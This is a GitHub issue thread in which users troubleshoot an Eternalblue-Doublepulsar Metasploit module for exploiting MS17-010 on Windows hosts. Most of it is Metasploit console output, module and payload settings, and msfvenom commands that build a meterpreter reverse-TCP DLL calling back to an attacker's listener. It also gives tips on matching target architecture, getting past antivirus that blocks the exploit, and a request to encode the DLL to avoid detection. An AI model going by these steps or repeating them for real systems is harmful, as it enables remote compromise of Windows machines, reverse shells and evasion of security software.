NickGoodLuck
commented
7 years ago Hi, I think u need to provide more details. such as target information, ur metasploit setting, the parameters u set for dll.
Closed UrielRicardo closed 7 years ago
NickGoodLuck
commented
7 years ago Hi, I think u need to provide more details. such as target information, ur metasploit setting, the parameters u set for dll.
UrielRicardo
commented
7 years ago rhost = Windows server 2008 r2, rport = 445 lsass.dll lhost = my ip payload = reverse tcp
NickGoodLuck
commented
7 years ago Hi, I am not sure what's your target architecture(x86 or x64), the exploit's default payload is windows/meterpreter/reverse_tcp ,it is for x86, and the DLL for Doublepulsar should be built by command "./msfvenom -p windows/meterpreter/reverse_tcp ......". For x64, u should change the default target architecture, default payload and the command for building dll should be "./msfvenom -p windows/x64/meterpreter/reverse_tcp ......". P.S the exploit is workable. Good luck! A screenshot is useful for solving the issue!
msdnteam
commented
7 years ago Found a solution? I have the same problem( The fact is that when i start eternalblue direct(ip to ip) Works well. When i start through the route i get such problem. The computer is the same. IP to IP well - through route no
msf > route
Subnet Netmask Gateway
192.168.145.0 255.255.255.0 Session 1
msf auxiliary(smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
RHOSTS 192.168.145.10 yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > run
[*] 192.168.145.10:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:WIN4) (workgroup:WORKGROUP)
msf exploit(eternalblue_doublepulsar) > run
[] Started reverse TCP handler on 192.168.100.105:4444 [] 192.168.145.10:445 - Generating Eternalblue XML data [] 192.168.145.10:445 - Generating Doublepulsar XML data [] 192.168.145.10:445 - Generating payload DLL for Doublepulsar [] 192.168.145.10:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.145.10:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.145.10:445 - Are you sure it's vulnerable?
mapagm
commented
7 years ago Same issue here.
msf auxiliary(smb_ms17_010) > run
[+] XXX.XXX.X.XX:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 9600)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedModule options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST XXX.XXX.X.XX yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST XXX.XXX.X.XX yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)I get error:
[*] Started reverse TCP handler on XXX.XXX.X.XX:4444
[*] XXX.XXX.X.XX:445 - Generating Eternalblue XML data
[*] XXX.XXX.X.XX:445 - Generating Doublepulsar XML data
[*] XXX.XXX.X.XX:445 - Generating payload DLL for Doublepulsar
[*] XXX.XXX.X.XX:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] XXX.XXX.X.XX:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] XXX.XXX.X.XX:445 - Are you sure it's vulnerable?
[*] XXX.XXX.X.XX:445 - Launching Doublepulsar...
[-] XXX.XXX.X.XX:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
netzeng
commented
7 years ago I have the same problem with you
[+] 192.168.144.128:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2003 3790 Service Pack 1) [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Doublepulsar ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Eternalblue PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 192.168.144.128 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.144.134 yes The listen address LPORT 4444 yes The listen port
[] Started reverse TCP handler on 192.168.144.134:4444 [] 192.168.144.128:445 - Generating Eternalblue XML data [] 192.168.144.128:445 - Generating Doublepulsar XML data [] 192.168.144.128:445 - Generating payload DLL for Doublepulsar [] 192.168.144.128:445 - Writing DLL in /root/eternal11.dll [] 192.168.144.128:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.144.128:445 - Are you sure it's vulnerable? [] 192.168.144.128:445 - Launching Doublepulsar... [-] 192.168.144.128:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
NickGoodLuck
commented
7 years ago @netzeng ur TARGETARCHITECTURE is x86 and ur Payload is for x64!This may be a problem!
netzeng
commented
7 years ago thanks very much。Problem has been resolved set TARGETARCHITECTURE x86 set Payload windows/x86/meterpreter_reverse_tcp
BratE9000
commented
7 years ago Compared to netzeng I don't know if Payload locations changed since June 11, but for me, I found them here:
set Payload windows/x64/meterpreter/reverse_tcp
set Payload windows/meterpreter/reverse_tcpI still never got it working on Windows XP MCE (x86):
use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > run
[+] 192.168.10.155:445 - Host is likely VULNERABLE to MS17-010! (Windows 5.1) [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 192.168.10.155 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.10.190 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name 0 Windows XP (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) > exploit [] Started reverse TCP handler on 192.168.10.190:4444 [] 192.168.10.155:445 - Generating Eternalblue XML data [] 192.168.10.155:445 - Generating Doublepulsar XML data [] 192.168.10.155:445 - Generating payload DLL for Doublepulsar [] 192.168.10.155:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.10.155:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.10.155:445 - Are you sure it's vulnerable? [] 192.168.10.155:445 - Launching Doublepulsar... [-] 192.168.10.155:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
I did have SP3 installed and a security update, but I backed those out. I am going to try a new load from disk and try the exploit before applying the updates.
Has anyone done this successfully on Windows MCE? See anything wrong in my settings/commands? Thanks!
Update: I tried a reloading from an old DVD, tried XP Pro from the XP Mode image, tried a different attack platform. always the same. Does this thing work on XP? Please help.
Alex-Fillipe
commented
6 years ago My give it too, someone else got it? because I already did everything to be commenting here, except for x86 because my kali linux does not have this option.
BratE9000
commented
6 years ago I feel your pain. I tried XP Pro, XP MCE (both x86), vista Ultimate x64. No luck. Loaded up Server 2008 and got it first try. But this thread is closed. There are a couple open issues you can post to.
u-s-fire
commented
6 years ago нужна помощ
skype u.s.fire
Bertrand-47
commented
5 years ago I faced the same problem while trying to test the MS17_010 exploit. I tried everything, and even I reinstalled the system but nothing changed. I felt like hell. But finally, I figure out the problem.
So here was my scenario at first, I scanned my target using auxiliary/scanner/smb_ms17_010 and Bingo! My target was vulnerable. I went on with exploit/windows/smb/ms17_010 and I filled all the information but it stuck on launching eternal blue and after a while, a message pops up telling me the target is not vulnerable.
I was convinced that there was something I was not passing well in the exploit like payload, target architecture, I tried everything but I got the same result.
And Finally, I discovered that on my target computer there was a crashed antivirus which was not popping up a message that it caught something(It was AVAST to be precise) but when my exploit was trying to be launched the AV was intercepting the connection identify it as a potential threat. and Block that connection. So My Computer or my exploit was not able to communicate with the back-door because it was never installed on the target computer. So I deactivate it for checking and I retried my exploit and everything worked properly and I was able to get the meterpreter :-)
So my Advice is this for those who will face the same issue.
You need to understand that the auxiliary/scanner/smb_ms17_010 is not giving the wrong information about the scanned system. The given information is true Even though the system is vulnerable the modern AV software are meant to reinforce the system security so they may be an obstacle for your exploit. *There is nothing wrong with your OS
Check and see if there is any AV software running on your target computer before going any further.
I hope it helps
Alex-Fillipe
commented
5 years ago Thank you
Enviado do meu iPhone
Em 28 de dez de 2018, à(s) 23:22, Bertrand SIBOMANA notifications@github.com<mailto:notifications@github.com> escreveu:
I faced the same problem while trying to test the MS17_010 exploit. I tried everything, and even I reinstalled the system but nothing changed. I felt like hell. But finally, I figure out the problem.
So here was my scenario at first, I scanned my target using auxiliary/scanner/smb_ms17_010 and Bingo! My target was vulnerable. I went on with exploit/windows/smb/ms17_010 and I filled all the information but it stuck on launching eternal blue and after a while, a message pops up telling me the target is not vulnerable.
I was convinced that there was something I was not passing well in the exploit like payload, target architecture, I tried everything but I got the same result.
And Finally, I discovered that on my target computer there was a crashed antivirus which was not popping up a message that it caught something(It was AVAST to be precise) but when my exploit was trying to be launched the AV was intercepting the connection identify it as a potential threat. and Block that connection. So My Computer or my exploit was not able to communicate with the back-door because it was never installed on the target computer. So I deactivate it for checking and I retired my exploit and everything worked properly and I was able to get the meterpreter :-)
So my Advice is this for those who will face the same issue.
You need to understand that the auxiliary/scanner/smb_ms17_010 is not giving the wrong information about the scanned system. The given information is true Even though the system is vulnerable the modern AV software are meant to reinforce the system security so they may be an obstacle for your exploit. *There is nothing wrong with your OS
Check and see if there is any AV software running on your target computer before going any further.
I hope it helps
— You are receiving this because you commented. Reply to this email directly, view it on GitHubhttps://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/9#issuecomment-450457123, or mute the threadhttps://github.com/notifications/unsubscribe-auth/AfiRGRITe9Srlbtizwrnt10voX2ZoRGNks5u9tHygaJpZM4NOXT3.
Bertrand-47
commented
5 years ago You're Welcome!!
rodribruno81
commented
5 years ago Hi, the antivirus detect eternal11.dll file. How do you do encode it? Thank!
msf exploit(eternalblue_doublepulsar) > run
[] Started reverse TCP handler on xxxxxxxxxxxxxxxx:4444 [] xxxxxxxxxxxxxxxx:445 - Generating Eternalblue XML data [] xxxxxxxxxxxxxxxx:445 - Generating Doublepulsar XML data [] xxxxxxxxxxxxxxxx:445 - Generating payload DLL for Doublepulsar [] xxxxxxxxxxxxxxxx:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] xxxxxxxxxxxxxxxx:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] xxxxxxxxxxxxxxxx:445 - Are you sure it's vulnerable? [] xxxxxxxxxxxxxxxx:445 - Launching Doublepulsar... [-] xxxxxxxxxxxxxxxx:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
I've rounded the scanner and returned that it is vulnerable, What would this error be?